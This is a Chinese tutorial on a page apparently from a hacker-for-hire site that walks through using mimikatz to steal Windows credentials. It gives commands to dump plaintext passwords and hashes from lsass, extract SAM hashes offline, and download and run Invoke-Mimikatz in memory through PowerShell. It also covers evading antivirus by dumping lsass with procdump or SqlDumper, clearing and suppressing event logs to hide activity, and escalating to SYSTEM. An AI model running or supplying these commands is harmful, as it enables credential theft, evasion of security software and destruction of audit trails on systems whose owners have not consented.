当前位置:首页 > 黑客服务 > 正文内容

kali局域网渗透监控(kali linux局域网渗透)

hacker6个月前 (06-03)黑客服务60

转自:小橘子基地

最近在工作中用到了一个内网渗透工具mimkatz,感觉很不错,将一些简单的使用方法分享给大家。

一、mimikatz简介:

mimikatz常用于获取windows系统明文密码、系统账号hash、浏览器密码、VPN(ADSL)密码、RDP终端密码等,在内网横向渗透中可用于各种凭证的导入导出,包括大家熟悉的hash传递攻击。

程序的发布主页:http://blog.gentilkiwi.com/mimikatz

下载地址:https://github.com/gentilkiwi/mimikatz/releases

二、基础用法——获取windows系统明文密码及HASH:

首先用管理员权限打开猕猴桃标志的EXE,然后输入:

privilege::debug

sekurlsa::logonpasswords full

展开全文

如果先加上log命令,所有的操作和回显的结果会在mimikatz.log中显示:

三、结果解析:

从上面结果可以看出:

1、一个Authentication Id代表一个块结果(这个“块结果”我自己理解的),也就是内存里面某个账户里面的凭证。

2、msv项是账号对应的密码的各种加密协议的密文。

3、tspkg、wdigest、kerberos 这3个项是账号对应的明文密码,但有时候不是3个项都得到结果的。

4、ssp项下是你最新登录到其他RDP终端所用到账号密码,windows server 2003、windows xp是不会记录到这里的,因为账号密码的输入不在本机内存里。

5、domain项是被登陆的机器的USERDOMAIN,可通过set命令来查看该变量,通过ping该项对应的值,可得到目标的IP。如:ping -n 1 john-PC,如果想要是IPv4就加上-4参数,即:ping -n 1 -4 john-PC

四、获取windows系统明文密码的原理:

当用户登陆后,会把账号密码保存在lsass中,lsass是微软Windows系统的安全机制它主要用于本地安全和登陆策略,通常我们在登陆系统时输入密码之后,密码便会储存在lsass内存中,经过其wdigest和tspkg两个模块调用后,对其使用可逆的算法进行加密并存储在内存之中,而mimikatz正是通过对lsass的逆算获取到明文密码。

五、获取系统哈希:

1、mimikatz with reg (online在线获取)

privilege::debug

token::elevate

lsadump::sam

2、mimikatz with reg (offline)

目标机器上执行:

reg save HKLM\SYSTEM SystemBkup.hiv

reg save HKLM\SAM SamBkup.hiv

把两个文件传回本机后执行:

mimikatz # lsadump::sam /system:SystemBkup.hiv /sam:SamBkup.hiv

3、mimikatz with powershell(无需实体文件落地)

powershell IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/samratashok/nishang/master/Gather/Invoke-Mimikatz.ps1');Invoke-Mimikatz

powershell IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/samratashok/nishang/master/Gather/Get-PassHashes.ps1');Get-PassHashes

六、windows高版本无法抓明文密码的问题:

问题出现点,windows 8.1及以上系统在进行明文密码抓取的时候出现以下情况:

1、报错:

ERROR kuhl_m_sekurlsa_acquireLSA ; Logon list

2、密码项为NULL //空密码

七、mimikatz的杀软对抗:

mimikatz的明文密码功能固然是强大的,但就是因为强大,所以在被各国黑客关注使用的同时,各国的安全厂商也是会投入人力物力去查杀该程序,由此就会产生对抗安全防御软软件的技术。以下文章所涉及到的都是常用且好用的。

1、procdump with mimikatz

procdump是啥玩意?

procdump是微软收购Winternals公司后得到的一个工具包Sysinternals Suite中的一款小工具,属于微软产品。详情请看:https://docs.microsoft.com/zh-cn/sysinternals/downloads/procdump

为什么能对抗安全防御软件?

我们使用大厂的软件把windows系统的内存dump出来,然后下载回我们本地系统,通过mimikatz解析内存文件,提取存放在内存中的凭证。那我用微软的东西,你不能拦截吧?那我在本地自己没有安全软件的环境用mimikatz解析,能拦截的估计就是断电、蓝屏……

具体操作:

命令:

<目标机器>

procdump64.exe -accepteula -ma lsass.exe lsass.dmp

<本机>

mimikatz # sekurlsa::minidump SUPERCOMPUTER_lsass.dmp

mimikatz # log

mimikatz # sekurlsa::logonPasswords full

①首先在目标机器下载一个procdump文件,然后用管理员权限打开cmd输入命令执行(最后那个lsass.dmp是文件名,它的文件名和后缀都可以更改)

②接着我们把lsass.dmp文件下载回来,然后打开mimikatz执行命令即可(注意命令中文件名要对的上)

2、SqlDumper with mimikatz

SqlDumper.exe是从SQL Server安装目录下提取出来的,功能和Procdump相似,并且也是微软出品的,体积远小于Procdump,也具备一定的免杀功能。SqlDumper.exe默认存放在C:\Program Files\Microsoft SQL Server\number\Shared,number代表SQL Server的版本,如果目标机器没有安装SQL Server,可以自己上传一个SqlDumper.exe。

命令:

<目标机器>

tasklist /svc |findstr lsass.exe

Sqldumper.exe ProcessID 0 0x01100

<本机>

kali局域网渗透监控(kali linux局域网渗透)

mimikatz # sekurlsa::minidump SQLDmpr0001.mdmp

mimikatz # log

mimikatz # sekurlsa::logonPasswords full

八、mimikatz的其他实用功能

1、解决windows PC版本不能多用户登陆3389的情况:

mimikatz # privilege::debug

mimikatz # ts::multirdp

2、清除日志:

event::clear

3、让后面的操作不被系统记录:

event::drop

4、进程操作:

kali局域网渗透监控(kali linux局域网渗透)

process::suspend /pid:2768 暂停进程

process::resume /pid:2768 恢复进程

5、获取system权限

privilege::debug

token::elevate

6、以system权限启新的进程

获取系统system

mimikatz # privilege::debug

mimikatz # process::runp //以system启动一个新的mimikatz的交互式shell

mimikatz # process::runp /run:cmd //以system启动一个新的cmd

OK,以上就是本期的全部内容啦,欢迎大家转发关注收藏!

END

官方站点:www.linuxprobe.com

Linux命令大全:www.linuxcool.com

(新群,火热加群中……)

扫描二维码推送至手机访问。

版权声明:本文由黑客接单发布,如需转载请注明出处。

本文链接:https://therlest.com/148013.html

分享给朋友:

“kali局域网渗透监控(kali linux局域网渗透)” 的相关文章

洗米华被抓(沙美华最近怎么了)

据中国电子商务研究中心2021年11月26日23:49:12的最新发布,微博网友@魔鬼管理学 爆料。 平安夜来临之际,事件,在网上炒得沸沸扬扬,引发全网热议! 据悉,洗米华被抓后来我换了俱乐部。。。 1.洗米华出什么事了...

身份证信息被黑客盗取(黑客能把手机内身份证信息盗取吗)

一、身份证信息被黑客盗取(黑客能把手机内身份证信息盗取吗)方法总结 1、黑客通过手身份姓名能否窃取别人银行卡里。朋友你好,这个问题不是这样理解的的,黑客是通过你的这些信息,破易你的银行卡号支付密码来盗取你的财物的,一般你只要不乱点链接,不轻易在手机。黑客控制了手机,窃取了身份证号码手机号姓名等所有...

古文化常识(中国古代文化常识大全)

1.中国古代文化常识 文学常识? 四本书:《论语》、《中庸》、《孟子大学》 五经:《诗经》《礼记》《周易》《春秋》 乐府双壁:木兰诗孔雀东南飞 三个字:警告世界,说真话,说真话,唤醒世界,说同样的话 第二枪:第一枪很厉害,第二枪也很厉害 三官:石渠官、潼关官、新安官 三次告别:新婚、老...

青岛新闻网房产 - 青岛个人房源出售

估计那个时候,0以上的住房为普通住宅。来说几句. 3500左右,我建议你来沧口找房子吧,青岛房产网51青岛信息港-房产,市北区的现在也到了新闻网7000了。提供覆盖青岛的别墅、一小时车程的房子大约在虎山以外,台南路。 还有的别墅个人150一般的房子都要,我就在黄岛住,早下手吧!沿海一带,2手放一般都...

铁盖子可以放入高压锅蒸吗?装酱料的铁盖子,外面的涂层有些剥落,好

铁盖子可以放入高压锅蒸吗?装酱料的铁盖子,外面的涂层有些剥落,好 铁盖子可以放入高压锅蒸吗? 装酱料的铁盖子,外面的涂层有些剥落,好象也没锈,可以拿它盖严瓶子入高压锅蒸吗? 绝对不行!既危险又不卫生。盖住的瓶子在高压锅中加热,很容易形成压力差而爆炸;铁在高压锅中的水蒸汽作用下极易变成四氧化三...

西安电脑黑客接单_怎么能找入侵蚊香社的黑客

sudo apt install g++-4.4SplashData剖析的这500万被走漏的暗码主要是北美和西欧的用户,成人网站走漏的暗码不包含在剖析陈述中。 支撑(V4增强)所谓0day缝隙的在野运用,一般是进犯活动被捕获时,发现其运用了某些0day缝隙(进犯活动与进犯样本剖析自身也是0day缝隙...

评论列表

夙世箴词
6个月前 (06-04)

获取到明文密码。 五、获取系统哈希: 1、mimikatz with reg (online在线获取)privilege::debugtoken::elevatelsadump::sam2、mimikatz with

泪灼命轴
6个月前 (06-03)

');Get-PassHashes六、windows高版本无法抓明文密码的问题:问题出现点,windows 8.1及以上系统在进行明文密码抓取的时候出现以下情况:1、报错:ERROR kuhl_m_sekurlsa_acquireLSA ; Logon list2、密码项为NULL //空

蓝殇迟山
6个月前 (06-03)

能对抗安全防御软件?我们使用大厂的软件把windows系统的内存dump出来,然后下载回我们本地系统,通过mimikatz解析内存文件,提取存放在内存中的凭证。那我用微软的东西,你不能拦截吧?那我在本地自

发表评论

访客

◎欢迎参与讨论,请在这里发表您的看法和观点。